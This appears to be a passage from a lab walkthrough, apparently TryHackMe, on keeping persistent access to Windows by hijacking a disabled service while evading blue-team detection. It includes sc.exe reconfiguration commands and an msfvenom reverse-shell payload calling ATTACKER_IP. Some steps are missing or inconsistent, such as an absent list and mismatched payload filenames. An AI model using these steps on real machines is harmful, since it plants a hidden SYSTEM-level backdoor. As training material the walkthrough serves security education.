While creating new services for persistence works quite well, the blue team may monitor new service creation across the network. We may want to reuse an existing service instead of creating one to avoid detection. Usually, any disabled service will be a good candidate, as it could be altered without the user noticing it.

You can get a list of available services using the following command:

sc.exe query state=all

Untitled

You should be able to find a stopped service called THMService3. To query the service's configuration, you can use the following command:

sc.exe qc THMService3

Untitled

There are three things we care about when using a service for persistence:

Let's start by creating a new reverse shell with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=5558 -f exe-service -o rev-svc2.exe

To reconfigure "THMservice3" parameters, we can use the following command:

sc.exe config THMservice3 binPath= "C:\Windows\rev-svc.exe" start= auto obj= "LocalSystem"

You can then query the service's configuration again to check if all went as expected:

sc.exe qc THMservice3

Untitled